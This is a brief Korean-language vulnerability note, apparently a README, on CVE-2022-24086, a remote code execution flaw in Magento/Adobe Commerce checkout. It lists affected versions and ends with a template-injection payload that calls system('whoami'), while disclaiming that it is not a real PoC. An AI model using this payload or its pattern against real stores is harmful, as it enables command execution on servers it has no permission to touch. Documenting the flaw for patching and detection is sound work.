
Magento RCE에 대한 CVE-2022-24086
CVE-2022-24086 - Magento RCE에 관한 내용
Adobe Commerce 2.4.3-p1 (및 이전 버전)과 2.3.7-p2 (및 이전 버전)는 체크아웃 과정에서 입력 검증 취약점으로 인해 영향을 받습니다. 이 문제를 악용하기 위해 사용자 상호작용이 필요하지 않으며, 임의 코드 실행으로 이어질 수 있습니다.
참고: 이것은 실제 POC가 아닙니다 ...

POC
{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}